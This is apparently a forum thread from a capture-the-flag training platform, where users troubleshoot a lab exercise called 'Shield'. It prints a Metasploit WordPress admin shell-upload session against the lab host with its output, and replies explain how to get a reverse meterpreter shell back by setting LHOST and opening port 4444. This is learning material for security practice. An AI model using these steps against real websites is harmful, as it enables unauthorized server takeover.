Starting Point - Shield

Hi guys,
I am stuck in a loop in Shield at the Starting Point. I am in between the last step of WordPress, where I can exploit WordPress using 'msfconsole', and the beginning point of Netcat; it doesn't seem that I can upload nc.exe. Do you have any advice here?
I've worked my way around msf by changing payload types, but no meterpreter worked.
What else am I missing?

Comments

  • edited April 5

    You might have downloaded the wrong netcat file... I used version 1.11 and it worked
    then just follow the walkthrough, it should work :smile:

  • Thanks for the replies, guys. However, I think the issue is with msf. I can't get a meterpreter prompt following the same steps.
    -------------Metasploit---------------
    msfconsole
    msf > use exploit/unix/webapp/wp_admin_shell_upload
    msf > set PASSWORD [email protected]!
    msf > set USERNAME admin
    msf > set TARGETURI /wordpress
    msf > set RHOSTS 10.10.10.29

    msf > run

    When I hit run, it returns:
    -----------result-------
    [*] Authenticating with WordPress using admin:[email protected]!...
    [+] Authenticated with WordPress
    [*] Preparing payload...
    [*] Uploading payload...
    [*] Executing the payload at /wordpress/wp-content/plugins/nvCLEyQPUq/euQfJdmBzj.php...
    [!] This exploit may require manual cleanup of 'euQfJdmBzj.php' on the target
    [!] This exploit may require manual cleanup of 'nvCLEyQPUq.php' on the target
    [!] This exploit may require manual cleanup of '../nvCLEyQPUq' on the target
    [*] Exploit completed, but no session was created.

    msf5 exploit(unix/webapp/wp_admin_shell_upload) >

    So the exploit completed, but no session, so no meterpreter. Is that normal at this point, or have I got something wrong?

    Plus one more issue: the lcd command doesn't work.
    msf > lcd /home/username/Downloads

  • check your firewall and username is not real username

  • @anggabvmv said:

    check your firewall and username is not real username

    Many thanks man, captured the flag :)

  • Hi, I am new here and I do not know if I should open a new discussion or not, but this one is about exactly my problem.
    Could you give me one more hint about the "Exploit completed, but no session was created." situation? I could not divine what @anggabvmv said on April 7.

  • sysgh0st, try 'set LHOST 10.10.14.xx' before 'run', where xx is your IP.

  • Thanks for the tip. I'll try to explain how I solved it in my case and hopefully you'll be able to spawn the meterpreter shell.

    I started msfconsole as sudo, then, after typing in the exploit necessities, I added the above command from @astrocat.
    When I ran the exploit, it still gave me the error, but that is when I realized that from the line "[*] Started reverse TCP handler on 10.10.14.xx (the htb ip):4444", Metasploit was sending the signal back to port 4444, which I hadn't personally allowed yet from the firewall (which was enabled).
    I quickly added a rule to my firewall to allow from 10.10.10.29 proto tcp to any port 4444, and when I constructed the shell again, it worked!!!
    So, by "check firewall", I believe @anggabvmv meant for us to create a door for the signal to come through. Hope this helps.